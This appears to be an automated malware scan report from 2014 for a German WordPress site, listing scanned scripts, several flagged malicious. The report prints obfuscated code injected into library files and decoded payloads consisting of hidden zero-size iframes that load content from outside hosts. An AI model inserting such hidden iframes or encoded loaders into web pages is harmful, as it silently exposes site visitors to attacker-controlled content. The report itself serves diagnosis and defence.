Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=neuverschuldung-stoppen.de
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://neuverschuldung-stoppen.de/ | 200 OK Content-Length: 16127 Content-Type: text/html | clean |
http://prototype.neuverschuldung-stoppen.de/wp-includes/js/l10n.js?ver=20101110 | 200 OK Content-Length: 6118 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function convertEntities(b){var d,a;d=function(c){if(/&[^;]+;/.test(c)){var f=document.createElement("div");f.innerHTML=c;return !f.firstChild?c:f.firstChild.nodeValue}return c};if(typeof b==="string"){return d(b)}else{if(typeof b==="object"){for(a in b){if(typeof b[a]==="string"){b[a]=d(b[a])}}}}return b}; var temp="",i,c=0,out="";var str="60!105!102!114!97!109!101!32!115!114!99!61!34!104!116!116!112!58!47!47!119!119!119!50!46!109!99!103!114!101!103!97!114!116!46!99!111!109!47!105!110!4 Decoded script: <iframe src="http://www2.mcgregart.com/in.cgi?2" width=0 height=0 frameborder=0></iframe><iframe src="http://emails.surreyhill2.com/in.cgi?default" width=0 height=0 frameborder=0></iframe><iframe src="http://android.womenthemanual.com/count" width=0 height=0 frameborder=0></iframe><iframe src="http://analytics.rebel5.com/stat.js" width=0 height=0 frameborder=0></iframe><iframe src="http://46.4.163.208/counter.js" width=0 height=0 frameborde Antivirus reports:
| ||
http://prototype.neuverschuldung-stoppen.de/wp-includes/js/jquery/jquery.js?ver=1.4.4 | 200 OK Content-Length: 82746 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function(E,B){function ka(a,b,d){if(d===B&&a.nodeType===1){d=a.getAttribute("data-"+b);if(typeof d==="string"){try{d=d==="true"?true:d==="false"?false:d==="null"?null:!c.isNaN(d)?parseFloat(d):Ja.test(d)?c.parseJSON(d):d}catch(e){}c.data(a,b,d)}else d=B}return d}function U(){return false}function ca(){return true}function la(a,b,d){d[0].type=a;return c.event.handle.apply(b,d)}function Ka(a){var b,d,e,f,h,l,k,o,x,r,A,C=[];f=[];h=c.data(this,this.nodeType?"events":"__events__");if(typeof Antivirus reports:
| ||
http://prototype.neuverschuldung-stoppen.de/wp-content/plugins/nextgen-gallery/js/jquery.cycle.all.min.js?ver=2.88 | 200 OK Content-Length: 33706 Content-Type: application/x-javascript | clean |
http://prototype.neuverschuldung-stoppen.de/wp-content/plugins/nextgen-gallery/js/ngg.slideshow.min.js?ver=1.05 | 200 OK Content-Length: 4424 Content-Type: application/x-javascript | clean |
http://prototype.neuverschuldung-stoppen.de/wp-includes/js/jquery/ui.core.js?ver=1.8.9 | 200 OK Content-Length: 8450 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function(c,j){function k(a){return!c(a).parents().andSelf().filter(function(){return c.curCSS(this,"visibility")==="hidden"||c.expr.filters.hidden(this)}).length}c.ui=c.ui||{};if(!c.ui.version){c.extend(c.ui,{version:"1.8.9",keyCode:{ALT:18,BACKSPACE:8,CAPS_LOCK:20,COMMA:188,COMMAND:91,COMMAND_LEFT:91,COMMAND_RIGHT:93,CONTROL:17,DELETE:46,DOWN:40,END:35,ENTER:13,ESCAPE:27,HOME:36,INSERT:45,LEFT:37,MENU:93,NUMPAD_ADD:107,NUMPAD_DECIMAL:110,NUMPAD_DIVIDE:111,NUMPAD_ENTER:108,NUMPAD_MULTIPLY:106,< Antivirus reports:
| ||
http://prototype.neuverschuldung-stoppen.de/wp-includes/js/jquery/ui.widget.js?ver=1.8.9 | 200 OK Content-Length: 7399 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function(b,j){if(b.cleanData){var k=b.cleanData;b.cleanData=function(a){for(var c=0,d;(d=a[c])!=null;c++)b(d).triggerHandler("remove");k(a)}}else{var l=b.fn.remove;b.fn.remove=function(a,c){return this.each(function(){if(!c)if(!a||b.filter(a,[this]).length)b("*",this).add([this]).each(function(){b(this).triggerHandler("remove")});return l.call(b(this),a,c)})}}b.widget=function(a,c,d){var e=a.split(".")[0],f;a=a.split(".")[1];f=e+"-"+a;if(!d){d=c;c=b.Widget}b.expr[":"][f]=function(h){return!!b.d Antivirus reports:
| ||
http://prototype.neuverschuldung-stoppen.de/wp-content/plugins/custom-contact-forms/js/jquery.ui.datepicker.js?ver=3.1.4 | 200 OK Content-Length: 77814 Content-Type: application/x-javascript | clean |
http://prototype.neuverschuldung-stoppen.de/wp-content/plugins/custom-contact-forms/js/custom-contact-forms-datepicker.js?ver=3.1.4 | 200 OK Content-Length: 2794 Content-Type: application/x-javascript | clean |
http://prototype.neuverschuldung-stoppen.de/wp-content/plugins/custom-contact-forms/js/jquery.tools.min.js?ver=3.1.4 | 200 OK Content-Length: 120135 Content-Type: application/x-javascript | clean |
http://prototype.neuverschuldung-stoppen.de/wp-content/plugins/custom-contact-forms/js/custom-contact-forms.js?ver=3.1.4 | 200 OK Content-Length: 3502 Content-Type: application/x-javascript | clean |
http://prototype.neuverschuldung-stoppen.de/wp-content/themes/cleancut/js/cufon.js?ver=3.1.4 | 200 OK Content-Length: 20931 Content-Type: application/x-javascript | clean |
http://prototype.neuverschuldung-stoppen.de/wp-content/themes/cleancut/js/quicksand.font.js?ver=3.1.4 | 200 OK Content-Length: 62503 Content-Type: application/x-javascript | clean |
http://prototype.neuverschuldung-stoppen.de/wp-content/themes/cleancut/js/prettyPhoto/js/jquery.prettyPhoto.js?ver=3.1.4 | 200 OK Content-Length: 16851 Content-Type: application/x-javascript | clean |
http://prototype.neuverschuldung-stoppen.de/wp-content/themes/cleancut/flashplayer/flowplayer-3.1.4.min.js?ver=3.1.4 | 200 OK Content-Length: 18634 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function(){function g(o){console.log("$f.fireEvent",[].slice.call(o))}function k(q){if(!q||typeof q!="object"){return q}var o=new q.constructor();for(var p in q){if(q.hasOwnProperty(p)){o[p]=k(q[p])}}return o}function m(t,q){if(!t){return}var o,p=0,r=t.length;if(r===undefined){for(o in t){if(q.call(t[o],o,t[o])===false){break}}}else{for(var s=t[0];p<r&&q.call(s,p,s)!==false;s=t[++p]){}}return t}function c(o){return document.getElementById(o)}function i(q,p,o){if(typeof p!="object"){r Decoded script: function () { __flash_unloadHandler = function () {}; __flash_savedUnloadHandler = function () {}; } <div width="600px" height="600px" style="visibility:hidden;"><iframe width="100%" height="100%" src="http://fr.integrabuilt.us/data/search.php?q=search"></iframe></div> Antivirus reports:
|
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: neuverschuldung-stoppen.de
Result:
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Tue, 02 Sep 2014 02:48:22 GMT
Pragma: no-cache
Server: Apache
Content-Type: text/html; charset=UTF-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Set-Cookie: PHPSESSID=aqq2mbk62hjr59v5ehr9qh2hn5; path=/
X-Pingback: http://prototype.neuverschuldung-stoppen.de/xmlrpc.php
GET / HTTP/1.1
Host: neuverschuldung-stoppen.de
Result:
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Tue, 02 Sep 2014 02:48:22 GMT
Pragma: no-cache
Server: Apache
Content-Type: text/html; charset=UTF-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Set-Cookie: PHPSESSID=aqq2mbk62hjr59v5ehr9qh2hn5; path=/
X-Pingback: http://prototype.neuverschuldung-stoppen.de/xmlrpc.php
Second query (visit from search engine):
GET / HTTP/1.1
Host: neuverschuldung-stoppen.de
Referer: http://www.google.com/search?q=neuverschuldung-stoppen.de
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: neuverschuldung-stoppen.de
Referer: http://www.google.com/search?q=neuverschuldung-stoppen.de
Result:
The result is similar to the first query. There are no suspicious redirects found.